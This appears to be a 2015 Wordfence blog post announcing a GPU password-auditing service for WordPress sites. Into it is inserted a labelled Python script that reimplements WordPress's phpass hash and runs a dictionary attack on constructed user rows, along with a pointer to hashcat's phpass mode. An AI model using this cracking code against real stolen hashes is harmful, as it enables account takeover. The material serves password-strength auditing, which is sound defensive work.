Wordfence Announces Password Auditing
This entry was posted in Wordfence, WordPress Security on April 8, 2015 by Mark Maunder
Today we are very excited to announce a new feature in Wordfence: Password Auditing. We have built a GPU cracking cluster by combining extremely high performance consumer gaming GPUs with enterprise hardware to give our customers a way to audit the strength of their administrator and user passwords.
We worked closely with our hosting provider Netriver in Lynnwood to commission a new custom higher power rack to provide this feature. A photo of the system is on the left.
To try out the new feature, update to the newest version of Wordfence (5.3.11 at the time of this release), click the “Password Auditing” menu option and follow the instructions to start an audit.
Once the audit is complete, you will see the results and can either change weak passwords yourself and have the new password emailed to the site member, or send your users and administrators a request to change their password themselves.
Once a weak password has been changed on your WordPress site, that user drops off the report of accounts with weak passwords, so you can keep track of who was reported in your last audit and who has fixed the problem. You can re-submit user or administrator accounts for a new password audit at any time.
The Password Audit simulates what an attacker would do after stealing your WordPress database: an offline cracking attack against the stored password hashes. WordPress stores passwords as salted, iterated MD5 (phpass “portable”) hashes, which are cheap enough per guess that GPU hardware can test very large dictionaries quickly. We run a GPU-accelerated cracking attack against your hashes to test the strength of your passwords.
For admin accounts we add a large dictionary that includes over 260 million known compromised passwords from previous breaches of major websites and services. This means that if, for example, your LinkedIn password was leaked in the 2012 LinkedIn breach and you reuse it on your site, the audit will flag that password as no longer safe to use.
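As an added example (not Wordfence’s code, and not the GPU pipeline described above), the Python script below shows the attack the audit simulates: it reimplements the phpass portable hash that WordPress of this era stores in wp_users.user_pass, builds a few constructed user rows, and runs a wordlist attack against them, applying the extra leaked-password list only to administrator accounts as described above. The usernames, roles, salts, passwords and both wordlists are constructed for the demonstration.

```python
"""Offline dictionary attack against WordPress phpass ("$P$") hashes.

Added example, not Wordfence code. Reimplements the phpass "portable"
hash WordPress stored via wp_hash_password() and runs a CPU wordlist
attack over constructed sample rows; all names, salts and words are made up.
"""
import hashlib
from typing import Dict, Optional, Sequence, Tuple

# phpass base-64 alphabet. The character after "$P$" indexes into it to give
# log2 of the MD5 iteration count; WordPress uses "B" -> 2**13 = 8192 rounds.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass encode64: 3 bytes -> 4 chars, little-endian, no padding."""
    out, i = [], 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Hash `password` under a 12-char setting ("$P$" + cost char + 8-char salt):
    MD5(salt + pw), then 2**cost rounds of MD5(previous digest + pw)."""
    count = 1 << ITOA64.index(setting[3])
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """True if `password` reproduces `stored` ($P$ or phpBB-style $H$)."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        return False
    cost = ITOA64.find(stored[3])
    if cost < 7 or cost > 30:  # same bounds phpass itself enforces
        return False
    return phpass_hash(password, stored) == stored


def crack_users(users: Sequence[Tuple[str, str, str]], base_words: Sequence[str],
                leaked_words: Sequence[str]) -> Dict[str, Optional[Tuple[str, str]]]:
    """Try every account against the base list; administrators are also tried
    against the leaked-credential list. Returns {login: (password, list) | None}."""
    results: Dict[str, Optional[Tuple[str, str]]] = {}
    for login, role, stored in users:
        lists = [("base", base_words)]
        if role == "administrator":
            lists.append(("leaked", leaked_words))
        results[login] = None
        for name, words in lists:
            hit = next((w for w in words if phpass_verify(w, stored)), None)
            if hit is not None:
                results[login] = (hit, name)
                break
    return results


# Constructed sample data: four wp_users rows as an attacker sees them after a
# database dump. Salts are fixed so the run is deterministic (WordPress draws
# them randomly per user); the plaintexts are only here to build the hashes.
SAMPLE_USERS = [
    ("admin",  "administrator", phpass_hash("linkedin2012",   "$P$Bk9Xb2mQz")),
    ("editor", "editor",        phpass_hash("password1",      "$P$BQv7LmN3p")),
    ("bob",    "subscriber",    phpass_hash("linkedin2012",   "$P$BzZ8aBc1D")),
    ("alice",  "subscriber",    phpass_hash("c7Qm#9vLpz2!Rw", "$P$BfGhJkLmN")),
]
# Constructed stand-ins for the two dictionaries described in the post.
BASE_WORDS = ["123456", "password", "wordpress", "password1", "letmein", "qwerty"]
LEAKED_WORDS = ["linkedin2012", "rockyou", "sunshine", "princess"]

if __name__ == "__main__":
    for login, hit in crack_users(SAMPLE_USERS, BASE_WORDS, LEAKED_WORDS).items():
        print(login, "->", f"cracked via {hit[1]} list: {hit[0]}" if hit else "not cracked")
```

Running it cracks `admin` (only because the leaked list is applied to administrators) and `editor` (from the base list), while `bob`, who reuses the same leaked password but is not an administrator, and `alice` survive; that asymmetry is exactly the policy the post describes. In practice the same attack is run with hashcat’s phpass mode (`-m 400`) on GPUs, where the 8192-round MD5 costs far less per guess than it does in Python.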
Internally, this feature uses two layers of encryption to protect your data during the audit. First we encrypt the hashes to be audited using a combination of AES and RSA public-key encryption; then we send the encrypted data to our servers over SSL, which provides the second layer. On our servers the data is stored encrypted until it is audited (the hashes are necessarily decrypted on the cluster while the audit itself runs), and we never return sensitive data to your website. Only password hashes ever leave your site, never plaintext passwords. [Hey, we’re security geeks, we love this stuff!]
We will be writing more about this amazing feature and password security over the coming days. We hope you enjoy the awesome new feature. We had a lot of fun building the hardware and software to provide this service.
Footnote: This service is only available to Premium Wordfence customers at this time. You can visit our home page to upgrade to Wordfence Premium now.